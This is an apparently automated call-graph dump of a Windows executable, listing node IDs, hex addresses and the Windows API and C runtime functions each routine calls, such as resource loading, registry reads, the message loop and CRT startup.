100079->100059 100080->100048 100082 c74ce1 100081->100082 100083 c74d9d LoadLibraryA 100081->100083 100082->99974 100082->99977 100083->100082 100084 c74dae GetProcAddress 100083->100084 100084->100082 100086 c90ff6 Mailbox 59 API calls 100085->100086 100087 c753a0 100086->100087 100087->99982 100089 c74fff 100088->100089 100090 c75003 FindResourceExW 100089->100090 100094 c75020 100089->100094 100091 cadd5c LoadResource 100090->100091 100090->100094 100092 cadd71 SizeofResource 100091->100092 100091->100094 100093 cadd85 LockResource 100092->100093 100092->100094 100093->100094 100094->99988 100096 c75054 100095->100096 100099 caddd4 100095->100099 100101 c95a7d 100096->100101 100098 c75062 100098->99994 100100->99988 100105 c95a89 _raise 100101->100105 100102 c95a9b 100114 c98d68 58 API calls __getptd_noexit 100102->100114 100104 c95ac1 100116 c96e4e 100104->100116 100105->100102 100105->100104 100106 c95aa0 100115 c98ff6 9 API calls _raise 100106->100115 100111 c95ad6 100123 c95af8 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 100111->100123 100113 c95aab _raise 100113->100098 100114->100106 100115->100113 100117 c96e5e 100116->100117 100118 c96e80 RtlEnterCriticalSection 100116->100118 100117->100118 100119 c96e66 100117->100119 100120 c95ac7 100118->100120 100121 c99e4b __lock 58 API calls 100119->100121 100122 c959ee 83 API calls 4 library calls 100120->100122 100121->100120 100122->100111 100123->100113 100127 c9582d 100124->100127 100126 c7508e 100126->100002 100128 c95839 _raise 100127->100128 100129 c9587c 100128->100129 100130 c95874 _raise 100128->100130 100132 c9584f _memset 100128->100132 100131 c96e4e __lock_file 59 API calls 100129->100131 100130->100126 100133 c95882 100131->100133 100154 c98d68 58 API calls __getptd_noexit 100132->100154 100140 c9564d 100133->100140 100136 c95869 100155 c98ff6 9 API calls _raise 100136->100155 100141 c95683 100140->100141 100143 c95668 _memset 100140->100143 100156 c958b6 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 100141->100156 100142 c95673 100144 c98d68 _raise 58 API calls 100142->100144 100143->100141 100143->100142 100147 c956c3 100143->100147 100153 c95678 100144->100153 100145 c98ff6 _raise 9 API calls 100145->100141 100146 ca0df7 __filbuf 72 API calls 100146->100147 100147->100141 100147->100146 100148 c957d4 _memset 100147->100148 100149 c94916 __ftell_nolock 58 API calls 100147->100149 100150 ca0f18 _memcpy_s 58 API calls 100147->100150 100152 ca10ab __read_nolock 70 API calls 100147->100152 100151 c98d68 _raise 58 API calls 100148->100151 100149->100147 100150->100147 100151->100153 100152->100147 100153->100145 100154->100136 100155->100130 100156->100130 100158 c95e9c _raise 100157->100158 100159 c95eae 100158->100159 100160 c95ec3 100158->100160 100171 c98d68 58 API calls __getptd_noexit 100159->100171 100161 c96e4e __lock_file 59 API calls 100160->100161 100164 c95ec9 100161->100164 100163 c95eb3 100172 c98ff6 9 API calls _raise 100163->100172 100173 c95b00 67 API calls 5 library calls 100164->100173 100167 c95ebe _raise 100167->100007 100168 c95ed4 100174 c95ef4 RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 100168->100174 100170 c95ee6 100170->100167 100171->100163 100172->100167 100173->100168 100174->100170 100176 c77a17 100175->100176 100177 c779ba 100175->100177 100178 c77e8c 59 API calls 100176->100178 100177->100176 100179 c779c5 100177->100179 100184 c779e8 _memmove 100178->100184 100180 c779e0 100179->100180 100181 caef32 100179->100181 100193 c78087 59 API calls Mailbox 100180->100193 100183 c78189 59 API calls 100181->100183 100185 caef3c 100183->100185 100184->99806 100186 c90ff6 Mailbox 59 API calls 100185->100186 100187 caef5c 100186->100187 100189 c77f06 100188->100189 100190 c77ef9 100188->100190 100191 c90ff6 Mailbox 59 API calls 100189->100191 100190->99800 100191->100190 100192->99828 100193->100184 100194->99874 100195->99876 100264 c9543a GetSystemTimeAsFileTime 100196->100264 100198 cd91f8 100198->99897 100199->99927 100201 c94a9f _raise 100200->100201 100202 c94abd 100201->100202 100203 c94ad5 100201->100203 100204 c94acd _raise 100201->100204 100278 c98d68 58 API calls __getptd_noexit 100202->100278 100205 c96e4e __lock_file 59 API calls 100203->100205 100204->99939 100207 c94adb 100205->100207 100266 c9493a 100207->100266 100208 c94ac2 100279 c98ff6 9 API calls _raise 100208->100279 100214 c955e2 _raise 100213->100214 100215 c955f6 100214->100215 100216 c9560e 100214->100216 100425 c98d68 58 API calls __getptd_noexit 100215->100425 100218 c96e4e __lock_file 59 API calls 100216->100218 100222 c95606 _raise 100216->100222 100221 c95620 100218->100221 100219 c955fb 100426 c98ff6 9 API calls _raise 100219->100426 100409 c9556a 100221->100409 100222->99931 100229->99904 100230->99912 100231->99905 100232->99905 100265 c95468 __aulldiv 100264->100265 100265->100198 100268 c94949 100266->100268 100273 c94967 100266->100273 100267 c94957 100268->100267 100268->100273 100275 c94981 _memmove 100268->100275 100280 c94b0d RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 100273->100280 100275->100273 100281 c94916 100275->100281 100288 c9dac6 100275->100288 100278->100208 100279->100204 100280->100204 100410 c95579 100409->100410 100411 c9558d 100409->100411 100425->100219 100426->100222 100540 c77dbf __NMSG_WRITE 100539->100540 100541 c78189 59 API calls 100540->100541 100542 c77dd0 _memmove 100540->100542 100543 caf130 _memmove 100541->100543 100542->99951 100545 c77b76 59 API calls 100544->100545 100562 c763c5 100545->100562 100546 c765ca 100572 c7766f 59 API calls 2 library calls 100546->100572 100548 c765e4 Mailbox 100548->99744 100551 c77eec 59 API calls 100551->100562 100552 c768f9 _memmove 100577 ccfdba 91 API calls 4 library calls 100552->100577 100553 cae41f 100575 ccfdba 91 API calls 4 library calls 100553->100575 100554 c7766f 59 API calls 100554->100562 100558 cae42d 100576 c7766f 59 API calls 2 library calls 100558->100576 100560 cae443 100560->100548 100561 cae3bb 100563 c78189 59 API calls 100561->100563 100562->100546 100562->100551 100562->100552 100562->100553 100562->100554 100562->100561 100566 c77faf 59 API calls 100562->100566 100570 c760cc 60 API calls 100562->100570 100571 c75ea1 59 API calls Mailbox 100562->100571 100573 c75fd2 60 API calls 100562->100573 100574 c77a84 59 API calls 2 library calls 100562->100574 100564 cae3c6 100563->100564 100568 c90ff6 Mailbox 59 API calls 100564->100568 100567 c7659b CharUpperBuffW 100566->100567 100567->100562 100568->100552 100569->99748 100570->100562 100571->100562 100572->100548 100573->100562 100574->100562 100575->100558 100576->100560 100577->100548 100579 cd3e7a 100578->100579 100580 cd46b1 FindFirstFileW 100578->100580 100579->99443 100580->100579 100581 cd46c6 FindClose 100580->100581 100581->100579 100583 c782ef 100582->100583 100586 c7830a 100582->100586 100584 c77faf 59 API calls 100583->100584 100585 c782f7 CharUpperBuffW 100584->100585 100585->100586 100586->99452 100588 c7f3b1 100587->100588 100590 c7f3d2 100588->100590 100698 cda0b5 89 API calls 4 library calls 100588->100698 100590->99457 100592 c784ed 100591->100592 100593 caf1e6 100591->100593 100594 c90ff6 Mailbox 59 API calls 100592->100594 100595 c784f4 100594->100595 100596 c78515 100595->100596 100699 c78794 59 API calls Mailbox 100595->100699 100596->99471 100596->99479 100599 cb50ed 100598->100599 100611 c80b55 100598->100611 100742 cda0b5 89 API calls 4 library calls 100599->100742 100601 c80e5a 100601->99499 100603 c81044 100603->100601 100605 c81051 100603->100605 100740 c811f3 330 API calls Mailbox 100605->100740 100606 c80bab PeekMessageW 100663 c80b65 Mailbox 100606->100663 100609 c81058 LockWindowUpdate DestroyWindow GetMessageW 100609->100601 100613 c8108a 100609->100613 100610 c80e44 100610->100601 100739 c811d0 10 API calls Mailbox 100610->100739 100611->100663 100743 c79fbd 60 API calls 100611->100743 100744 cc68bf 330 API calls 100611->100744 100612 cb52ab Sleep 100612->100663 100615 cb6082 TranslateMessage DispatchMessageW GetMessageW 100613->100615 100615->100615 100616 cb60b2 100615->100616 100616->100601 100617 c80fbf TranslateMessage DispatchMessageW 100618 c80fa3 PeekMessageW 100617->100618 100618->100663 100619 cb517a TranslateAcceleratorW 100619->100618 100619->100663 100620 c90ff6 59 API calls Mailbox 100620->100663 100621 c80e73 timeGetTime 100621->100663 100622 cb5c49 WaitForSingleObject 100627 cb5c66 GetExitCodeProcess CloseHandle 100622->100627 100622->100663 100624 c80fdd Sleep 100660 c80fee Mailbox 100624->100660 100625 c781a7 59 API calls 100625->100663 100626 c777c7 59 API calls 100626->100660 100658 c810f5 100627->100658 100628 cb5f22 Sleep 100628->100660 100630 c7b89c 303 API calls 100630->100663 100632 c90719 timeGetTime 100632->100660 100633 c810ae timeGetTime 100741 c79fbd 60 API calls 100633->100741 100636 cb5fb9 GetExitCodeProcess 100641 cb5fcf WaitForSingleObject 100636->100641 100642 cb5fe5 CloseHandle 100636->100642 100637 c79997 84 API calls 100637->100663 100639 cf61ac 110 API calls 100639->100660 100640 c7b93d 109 API calls 100640->100660 100641->100642 100641->100663 100642->100660 100644 cb5c9e 100644->100658 100645 c79fbd 60 API calls 100645->100663 100646 cb6041 Sleep 100646->100663 100647 cb54a2 Sleep 100647->100663 100650 c77f41 59 API calls 100650->100660 100654 c7a000 303 API calls 100654->100663 100656 c7f5c0 303 API calls 100656->100663 100657 c7fe40 303 API calls 100657->100663 100658->99499 100660->100626 100660->100632 100660->100636 100660->100639 100660->100640 100660->100644 100660->100646 100660->100647 100660->100650 100660->100658 100660->100663 100751 cd28f7 60 API calls 100660->100751 100752 c79fbd 60 API calls 100660->100752 100753 c78b13 69 API calls Mailbox 100660->100753 100754 c7b89c 330 API calls 100660->100754 100755 cc6a50 60 API calls 100660->100755 100756 cd54e6 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 100660->100756 100757 cd3e91 66 API calls Mailbox 100660->100757 100662 cda0b5 89 API calls 100662->100663 100663->100606 100663->100610 100663->100612 100663->100617 100663->100618 100663->100619 100663->100620 100663->100621 100663->100622 100663->100624 100663->100625 100663->100628 100663->100630 100663->100633 100663->100637 100663->100645 100663->100654 100663->100656 100663->100657 100663->100658 100663->100660 100663->100662 100664 c79df0 59 API calls Mailbox 100663->100664 100665 c78620 69 API calls 100663->100665 100666 cc66f4 59 API calls Mailbox 100663->100666 100668 c77f41 59 API calls 100663->100668 100669 c78b13 69 API calls 100663->100669 100670 cb59ff VariantClear 100663->100670 100671 cb5a95 VariantClear 100663->100671 100672 cb5843 VariantClear 100663->100672 100673 cc7405 59 API calls 100663->100673 100674 c78e34 59 API calls Mailbox 100663->100674 100700 c7e580 100663->100700 100707 c7e800 100663->100707 100738 c731ce IsDialogMessageW GetClassLongW 100663->100738 100745 cf629f 59 API calls 100663->100745 100746 cd9c9f 59 API calls Mailbox 100663->100746 100747 ccd9e3 59 API calls 100663->100747 100748 cc6665 59 API calls 2 library calls 100663->100748 100749 c78561 59 API calls 100663->100749 100750 c7843f 59 API calls Mailbox 100663->100750 100664->100663 100665->100663 100666->100663 100668->100663 100669->100663 100670->100663 100671->100663 100672->100663 100673->100663 100674->100663 100675->99524 100676->99528 100677->99522 100678->99522 100679->99453 100680->99465 100681->99463 100682->99465 100683->99465 100684->99467 100685->99480 100686->99476 100687->99476 100688->99478 100689->99482 100690->99522 100691->99522 100692->99522 100693->99522 100694->99465 100695->99507 100696->99517 100697->99465 100698->100590 100699->100596 100701 c7e5b1 100700->100701 100702 c7e59d 100700->100702 100759 cda0b5 89 API calls 4 library calls 100701->100759 100758 c7e060 330 API calls 2 library calls 100702->100758 100704 c7e5a8 100704->100663 100706 cb3ece 100706->100706 100708 c7e835 100707->100708 100709 cb3ed3 100708->100709 100712 c7e89f 100708->100712 100721 c7e8f9 100708->100721 100710 c7a000 330 API calls 100709->100710 100711 cb3ee8 100710->100711 100726 c7ead0 Mailbox 100711->100726 100761 cda0b5 89 API calls 4 library calls 100711->100761 100714 c777c7 59 API calls 100712->100714 100712->100721 100713 c777c7 59 API calls 100713->100721 100716 cb3f2e 100714->100716 100718 c92f80 __cinit 67 API calls 100716->100718 100717 c92f80 __cinit 67 API calls 100717->100721 100718->100721 100719 cb3f50 100719->100663 100720 c78620 69 API calls 100720->100726 100721->100713 100721->100717 100721->100719 100725 c7eaba 100721->100725 100721->100726 100723 c7f2f5 100766 cda0b5 89 API calls 4 library calls 100723->100766 100724 cda0b5 89 API calls 100724->100726 100725->100726 100762 cda0b5 89 API calls 4 library calls 100725->100762 100726->100720 100726->100723 100726->100724 100727 c7a000 330 API calls 100726->100727 100730 c79df0 Mailbox 59 API calls 100726->100730 100732 c78ea0 59 API calls 100726->100732 100737 c7ebd8 100726->100737 100760 c780d7 59 API calls 2 library calls 100726->100760 100763 cc7405 59 API calls 100726->100763 100764 cec8d7 330 API calls 100726->100764 100765 ceb851 330 API calls Mailbox 100726->100765 100767 ce96db 330 API calls Mailbox 100726->100767 100727->100726 100730->100726 100731 cb424f 100731->100663 100732->100726 100737->100663 100738->100663 100739->100603 100740->100609 100741->100663 100742->100611 100743->100611 100744->100611 100745->100663 100746->100663 100747->100663 100748->100663 100749->100663 100750->100663 100751->100660 100752->100660 100753->100660 100754->100660 100755->100660 100756->100660 100757->100660 100758->100704 100759->100706 100760->100726 100761->100726 100762->100726 100763->100726 100764->100726 100765->100726 100766->100731 100767->100726 100768->99537 100769->99535 100770->99300 100771 cb0226 100777 c7ade2 Mailbox 100771->100777 100773 cb0c86 100851 cc66f4 59 API calls Mailbox 100773->100851 100775 cb0c8f 100776 c79df0 Mailbox 59 API calls 100776->100777 100777->100773 100777->100775 100777->100776 100778 cb00e0 VariantClear 100777->100778 100779 c7b6c1 100777->100779 100781 ce474d 330 API calls 100777->100781 100785 cee237 100777->100785 100788 cee24b 100777->100788 100791 ce83a8 100777->100791 100849 cc7405 59 API calls 100777->100849 100778->100777 100850 cda0b5 89 API calls 4 library calls 100779->100850 100781->100777 100852 cecdf1 100785->100852 100787 cee247 100787->100777 100789 cecdf1 130 API calls 100788->100789 100790 cee25b 100789->100790 100790->100777 100962 c79a20 100791->100962 100793 ce83ca CoInitialize 100794 ce83e9 VariantInit 100793->100794 100795 ce83e3 100793->100795 100796 ce8605 100794->100796 100797 ce8411 100794->100797 100795->100794 100800 c90ff6 Mailbox 59 API calls 100796->100800 100798 ce8418 100797->100798 100799 ce85e4 100797->100799 100802 ce841b 100798->100802 100803 ce8487 100798->100803 100801 c79997 84 API calls 100799->100801 100804 ce8616 100800->100804 100805 ce85f1 100801->100805 100806 ce86ba VariantClear 100802->100806 100809 c79997 84 API calls 100802->100809 100811 ce849e 100803->100811 100812 ce859d 100803->100812 100807 ce8639 100804->100807 100810 c79997 84 API calls 100804->100810 100808 c79997 84 API calls 100805->100808 100806->100777 100831 ce855b 100807->100831 100979 cd7804 105 API calls Mailbox 100807->100979 100808->100796 100813 ce842f 100809->100813 100814 ce8629 100810->100814 100974 c79c9c 59 API calls 100811->100974 100819 c79997 84 API calls 100812->100819 100818 c79997 84 API calls 100813->100818 100964 ccda5d 100814->100964 100821 ce8445 100818->100821 100822 ce85a2 100819->100822 100820 ce84a3 100823 ce84c7 100820->100823 100975 c79c9c 59 API calls 100820->100975 100824 c79997 84 API calls 100821->100824 100825 c79997 84 API calls 100822->100825 100830 c90ff6 Mailbox 59 API calls 100823->100830 100827 ce8457 100824->100827 100828 ce85b4 100825->100828 100833 c79997 84 API calls 100827->100833 100829 c79997 84 API calls 100828->100829 100834 ce85c8 100829->100834 100841 ce84ed 100830->100841 100831->100806 100980 ce96db 330 API calls Mailbox 100831->100980 100832 ce84b8 100832->100823 100976 c79c9c 59 API calls 100832->100976 100836 ce846b 100833->100836 100978 ce9a72 337 API calls 3 library calls 100834->100978 100973 ce9a72 337 API calls 3 library calls 100836->100973 100840 ce8482 100840->100806 100843 ce8509 100841->100843 100844 c79997 84 API calls 100841->100844 100848 ce8538 100841->100848 100845 c79997 84 API calls 100843->100845 100844->100843 100846 ce8525 100845->100846 100847 ccda5d 8 API calls 100846->100847 100847->100848 100848->100831 100977 cd7804 105 API calls Mailbox 100848->100977 100849->100777 100850->100773 100851->100775 100853 c79997 84 API calls 100852->100853 100854 cece2e 100853->100854 100855 cece75 Mailbox 100854->100855 100890 cedab9 100854->100890 100855->100787 100857 ced242 100940 cedbdc 92 API calls Mailbox 100857->100940 100859 ced0db 100903 cecc82 100859->100903 100861 ced251 100861->100859 100862 ced25d 100861->100862 100862->100855 100863 c79997 84 API calls 100881 cecec6 Mailbox 100863->100881 100868 ced114 100918 c90e48 100868->100918 100871 ced12e 100924 cda0b5 89 API calls 4 library calls 100871->100924 100872 ced147 100925 c7942e 100872->100925 100875 ced139 GetCurrentProcess TerminateProcess 100875->100872 100876 ced0cd 100876->100857 100876->100859 100881->100855 100881->100863 100881->100876 100922 cdf835 59 API calls 2 library calls 100881->100922 100923 ced2f3 61 API calls 2 library calls 100881->100923 100882 ced2b8 100882->100855 100885 ced2cc FreeLibrary 100882->100885 100883 ced17f 100937 ced95d 107 API calls _free 100883->100937 100885->100855 100889 ced190 100889->100882 100938 c78ea0 59 API calls Mailbox 100889->100938 100939 c79e9c 60 API calls Mailbox 100889->100939 100941 ced95d 107 API calls _free 100889->100941 100891 c77faf 59 API calls 100890->100891 100892 cedad4 CharLowerBuffW 100891->100892 100942 ccf658 100892->100942 100896 c777c7 59 API calls 100897 cedb0d 100896->100897 100898 c779ab 59 API calls 100897->100898 100899 cedb24 100898->100899 100900 c77e8c 59 API calls 100899->100900 100901 cedb30 Mailbox 100900->100901 100902 cedb6c Mailbox 100901->100902 100949 ced2f3 61 API calls 2 library calls 100901->100949 100902->100881 100904 cecc9d 100903->100904 100908 ceccf2 100903->100908 100905 c90ff6 Mailbox 59 API calls 100904->100905 100906 ceccbf 100905->100906 100907 c90ff6 Mailbox 59 API calls 100906->100907 100906->100908 100907->100906 100909 cedd64 100908->100909 100910 cedf8d Mailbox 100909->100910 100916 cedd87 _strcat _wcscpy __NMSG_WRITE 100909->100916 100910->100868 100911 c79d46 59 API calls 100911->100916 100912 c79c9c 59 API calls 100912->100916 100913 c79cf8 59 API calls 100913->100916 100914 c79997 84 API calls 100914->100916 100915 c9594c 58 API calls __crtCompareStringA_stat 100915->100916 100916->100910 100916->100911 100916->100912 100916->100913 100916->100914 100916->100915 100952 cd5b29 61 API calls 2 library calls 100916->100952 100919 c90e5d 100918->100919 100920 c90ef5 VirtualAlloc 100919->100920 100921 c90ec3 100919->100921 100920->100921 100921->100871 100921->100872 100922->100881 100923->100881 100924->100875 100926 c79436 100925->100926 100927 c90ff6 Mailbox 59 API calls 100926->100927 100928 c79444 100927->100928 100929 c79450 100928->100929 100953 c7935c 59 API calls Mailbox 100928->100953 100931 c791b0 100929->100931 100954 c792c0 100931->100954 100933 c791bf 100934 c90ff6 Mailbox 59 API calls 100933->100934 100935 c7925b 100933->100935 100934->100935 100935->100889 100936 c78ea0 59 API calls Mailbox 100935->100936 100936->100883 100937->100889 100938->100889 100939->100889 100940->100861 100941->100889 100943 ccf683 __NMSG_WRITE 100942->100943 100944 ccf6c2 100943->100944 100947 ccf6b8 100943->100947 100948 ccf769 100943->100948 100944->100896 100944->100901 100947->100944 100950 c77a24 61 API calls 100947->100950 100948->100944 100951 c77a24 61 API calls 100948->100951 100949->100902 100950->100947 100951->100948 100952->100916 100953->100929 100955 c792c9 Mailbox 100954->100955 100956 caf5c8 100955->100956 100961 c792d3 100955->100961 100957 c90ff6 Mailbox 59 API calls 100956->100957 100958 caf5d4 100957->100958 100959 c792da 100959->100933 100960 c79df0 Mailbox 59 API calls 100960->100961 100961->100959 100961->100960 100963 c79a2b 100962->100963 100963->100793 100981 ccdc20 100964->100981 100966 ccdacf 100966->100807 100968 ccdaf9 SetErrorMode GetProcAddress 100969 ccdb18 100968->100969 100972 ccdb1f 100968->100972 100984 ccdd22 GetModuleFileNameW LoadTypeLibEx RegisterTypeLib RegisterTypeLibForUser 100969->100984 100971 ccdb8d SetErrorMode 100971->100966 100972->100971 100973->100840 100974->100820 100975->100832 100976->100823 100977->100831 100978->100831 100979->100831 100980->100806 100985 cc7652 100981->100985 100984->100972 100987 cc7667 100985->100987 100986 cc76a2 100986->100966 100986->100968 100987->100986 100988 cc7694 lstrcmpiW 100987->100988 100988->100986 100989 c7e608 100990 c7d260 330 API calls 100989->100990 100991 c7e616 100990->100991 100992 c71016 100997 c74ad2 100992->100997 100995 c92f80 __cinit 67 API calls 100996 c71025 100995->100996 100998 c90ff6 Mailbox 59 API calls 100997->100998 100999 c74ada 100998->100999 101000 c7101b 100999->101000 101004 c74a94 100999->101004 101000->100995 101005 c74aaf 101004->101005 101006 c74a9d 101004->101006 101008 c74afe 101005->101008 101007 c92f80 __cinit 67 API calls 101006->101007 101007->101005 101009 c777c7 59 API calls 101008->101009 101010 c74b16 GetVersionExW 101009->101010 101011 c77d2c 59 API calls 101010->101011 101012 c74b59 101011->101012 101013 c77e8c 59 API calls 101012->101013 101023 c74b86 101012->101023 101014 c74b7a 101013->101014 101036 c77886 101014->101036 101016 c74bf1 GetCurrentProcess IsWow64Process 101017 c74c0a 101016->101017 101019 c74c20 101017->101019 101020 c74c89 GetSystemInfo 101017->101020 101018 cadc8d 101032 c74c95 101019->101032 101021 c74c56 101020->101021 101021->101000 101023->101016 101023->101018 101025 c74c32 101028 c74c95 2 API calls 101025->101028 101026 c74c7d GetSystemInfo 101027 c74c47 101026->101027 101027->101021 101030 c74c4d FreeLibrary 101027->101030 101029 c74c3a GetNativeSystemInfo 101028->101029 101029->101027 101030->101021 101033 c74c2e 101032->101033 101034 c74c9e LoadLibraryA 101032->101034 101033->101025 101033->101026 101034->101033 101035 c74caf GetProcAddress 101034->101035 101035->101033 101037 c77894 101036->101037 101038 c77e8c 59 API calls 101037->101038 101039 c778a4 101038->101039 101039->101023 101040 c71055 101045 c72649 101040->101045 101043 c92f80 __cinit 67 API calls 101044 c71064 101043->101044 101046 c777c7 59 API calls 101045->101046 101047 c726b7 101046->101047 101052 c73582 101047->101052 101050 c72754 101051 c7105a 101050->101051 101055 c73416 59 API calls 2 library calls 101050->101055 101051->101043 101056 c735b0 101052->101056 101055->101050 101057 c735a1 101056->101057 101058 c735bd 101056->101058 101057->101050 101058->101057 101059 c735c4 RegOpenKeyExW 101058->101059 101059->101057 101060 c735de RegQueryValueExW 101059->101060 101061 c73614 RegCloseKey 101060->101061 101062 c735ff 101060->101062 101061->101057 101062->101061 101063 cb4599 101067 cc655c 101063->101067 101065 cb45a4 101066 cc655c 85 API calls 101065->101066 101066->101065 101068 cc6596 101067->101068 101073 cc6569 101067->101073 101068->101065 101069 cc6598 101079 c79488 84 API calls Mailbox 101069->101079 101071 cc659d 101072 c79997 84 API calls 101071->101072 101074 cc65a4 101072->101074 101073->101068 101073->101069 101073->101071 101076 cc6590 101073->101076 101075 c77c8e 59 API calls 101074->101075 101075->101068 101078 c79700 59 API calls _wcsstr 101076->101078 101078->101068 101079->101071 101080 c73633 101081 c7366a 101080->101081 101082 c736e7 101081->101082 101083 c73688 101081->101083 101120 c736e5 101081->101120 101087 cad31c 101082->101087 101088 c736ed 101082->101088 101084 c73695 101083->101084 101085 c7375d PostQuitMessage 101083->101085 101089 cad38f 101084->101089 101090 c736a0 101084->101090 101121 c736d8 101085->101121 101086 c736ca NtdllDefWindowProc_W 101086->101121 101130 c811d0 10 API calls Mailbox 101087->101130 101092 c73715 SetTimer RegisterClipboardFormatW 101088->101092 101093 c736f2 101088->101093 101145 cd2a16 71 API calls _memset 101089->101145 101096 c73767 101090->101096 101097 c736a8 101090->101097 101098 c7373e CreatePopupMenu 101092->101098 101092->101121 101094 cad2bf 101093->101094 101095 c736f9 KillTimer 101093->101095 101107 cad2f8 MoveWindow 101094->101107 101108 cad2c4 101094->101108 101125 c744cb Shell_NotifyIconW _memset 101095->101125 101128 c74531 64 API calls _memset 101096->101128 101102 c736b3 101097->101102 101103 cad374 101097->101103 101098->101121 101100 cad343 101131 c811f3 330 API calls Mailbox 101100->101131 101112 c7374b 101102->101112 101113 c736be 101102->101113 101103->101086 101144 cc817e 59 API calls Mailbox 101103->101144 101104 cad3a1 101104->101086 101104->101121 101107->101121 101109 cad2c8 101108->101109 101110 cad2e7 SetFocus 101108->101110 101109->101113 101115 cad2d1 101109->101115 101110->101121 101111 c7370c 101126 c73114 DeleteObject DestroyWindow Mailbox 101111->101126 101127 c745df 81 API calls _memset 101112->101127 101113->101086 101132 c744cb Shell_NotifyIconW _memset 101113->101132 101114 c7375b 101114->101121 101129 c811d0 10 API calls Mailbox 101115->101129 101120->101086 101123 cad368 101133 c743db 101123->101133 101125->101111 101126->101121 101127->101114 101128->101114 101129->101121 101130->101100 101131->101113 101132->101123 101134 c74406 _memset 101133->101134 101146 c74213 101134->101146 101137 c7448b 101139 c744a5 Shell_NotifyIconW 101137->101139 101140 c744c1 Shell_NotifyIconW 101137->101140 101141 c744b3 101139->101141 101140->101141 101150 c7410d 101141->101150 101143 c744ba 101143->101120 101144->101120 101145->101104 101147 c74227 101146->101147 101148 cad638 101146->101148 101147->101137 101172 cd3226 62 API calls _W_store_winword 101147->101172 101148->101147 101149 cad641 DestroyCursor 101148->101149 101149->101147 101151 c74200 Mailbox 101150->101151 101152 c74129 101150->101152 101151->101143 101153 c77b76 59 API calls 101152->101153 101154 c74137 101153->101154 101155 c74144 101154->101155 101156 cad5dd LoadStringW 101154->101156 101157 c77d2c 59 API calls 101155->101157 101159 cad5f7 101156->101159 101158 c74159 101157->101158 101158->101159 101160 c7416a 101158->101160 101161 c77c8e 59 API calls 101159->101161 101162 c74205 101160->101162 101163 c74174 101160->101163 101166 cad601 101161->101166 101164 c781a7 59 API calls 101162->101164 101165 c77c8e 59 API calls 101163->101165 101169 c7417e _memset _wcscpy 101164->101169 101165->101169 101167 c77e0b 59 API calls 101166->101167 101166->101169 101168 cad623 101167->101168 101171 c77e0b 59 API calls 101168->101171 101170 c741e6 Shell_NotifyIconW 101169->101170 101170->101151 101171->101169 101172->101137 101173 c97e93 101174 c97e9f _raise 101173->101174 101210 c9a048 GetStartupInfoW 101174->101210 101176 c97ea4 101212 c98dbc GetProcessHeap 101176->101212 101178 c97efc 101179 c97f07 101178->101179 101295 c97fe3 58 API calls 3 library calls 101178->101295 101213 c99d26 101179->101213 101182 c97f0d 101183 c97f18 __RTC_Initialize 101182->101183 101296 c97fe3 58 API calls 3 library calls 101182->101296 101234 c9d812 101183->101234 101186 c97f27 101187 c97f33 GetCommandLineW 101186->101187 101297 c97fe3 58 API calls 3 library calls 101186->101297 101253 ca5173 GetEnvironmentStringsW 101187->101253 101190 c97f32 101190->101187 101193 c97f4d 101194 c97f58 101193->101194 101298 c932f5 58 API calls 3 library calls 101193->101298 101263 ca4fa8 101194->101263 101197 c97f5e 101198 c97f69 101197->101198 101299 c932f5 58 API calls 3 library calls 101197->101299 101277 c9332f 101198->101277 101201 c97f71 101202 c97f7c __wwincmdln 101201->101202 101300 c932f5 58 API calls 3 library calls 101201->101300 101283 c7492e 101202->101283 101205 c97f90 101206 c97f9f 101205->101206 101301 c93598 58 API calls _doexit 101205->101301 101302 c93320 58 API calls _doexit 101206->101302 101209 c97fa4 _raise 101211 c9a05e 101210->101211 101211->101176 101212->101178 101303 c933c7 36 API calls 2 library calls 101213->101303 101215 c99d2b 101304 c99f7c InitializeCriticalSectionAndSpinCount __mtinitlocknum 101215->101304 101217 c99d30 101218 c99d34 101217->101218 101306 c99fca TlsAlloc 101217->101306 101305 c99d9c 61 API calls 2 library calls 101218->101305 101221 c99d39 101221->101182 101222 c99d46 101222->101218 101223 c99d51 101222->101223 101307 c98a15 101223->101307 101226 c99d93 101315 c99d9c 61 API calls 2 library calls 101226->101315 101229 c99d72 101229->101226 101231 c99d78 101229->101231 101230 c99d98 101230->101182 101314 c99c73 58 API calls 4 library calls 101231->101314 101233 c99d80 GetCurrentThreadId 101233->101182 101235 c9d81e _raise 101234->101235 101236 c99e4b __lock 58 API calls 101235->101236 101237 c9d825 101236->101237 101238 c98a15 __calloc_crt 58 API calls 101237->101238 101239 c9d836 101238->101239 101240 c9d8a1 GetStartupInfoW 101239->101240 101241 c9d841 _raise @_EH4_CallFilterFunc@8 101239->101241 101243 c9d9e5 101240->101243 101244 c9d8b6 101240->101244 101241->101186 101242 c9daad 101329 c9dabd RtlLeaveCriticalSection _doexit 101242->101329 101243->101242 101248 c9da32 GetStdHandle 101243->101248 101249 c9da45 GetFileType 101243->101249 101328 c9a06b InitializeCriticalSectionAndSpinCount 101243->101328 101244->101243 101246 c9d904 101244->101246 101247 c98a15 __calloc_crt 58 API calls 101244->101247 101246->101243 101250 c9d938 GetFileType 101246->101250 101327 c9a06b InitializeCriticalSectionAndSpinCount 101246->101327 101247->101244 101248->101243 101249->101243 101250->101246 101254 c97f43 101253->101254 101255 ca5184 101253->101255 101259 ca4d6b GetModuleFileNameW 101254->101259 101330 c98a5d 58 API calls 2 library calls 101255->101330 101257 ca51c0 FreeEnvironmentStringsW 101257->101254 101258 ca51aa _memmove 101258->101257 101260 ca4d9f _wparse_cmdline 101259->101260 101262 ca4ddf _wparse_cmdline 101260->101262 101331 c98a5d 58 API calls 2 library calls 101260->101331 101262->101193 101264 ca4fb9 101263->101264 101266 ca4fc1 __NMSG_WRITE 101263->101266 101264->101197 101265 c98a15 __calloc_crt 58 API calls 101273 ca4fea __NMSG_WRITE 101265->101273 101266->101265 101267 ca5041 101268 c92f95 _free 58 API calls 101267->101268 101268->101264 101269 c98a15 __calloc_crt 58 API calls 101269->101273 101270 ca5066 101271 c92f95 _free 58 API calls 101270->101271 101271->101264 101273->101264 101273->101267 101273->101269 101273->101270 101274 ca507d 101273->101274 101332 ca4857 58 API calls _raise 101273->101332 101333 c99006 IsProcessorFeaturePresent 101274->101333 101276 ca5089 101276->101197 101280 c9333b __IsNonwritableInCurrentImage 101277->101280 101279 c93359 __initterm_e 101281 c92f80 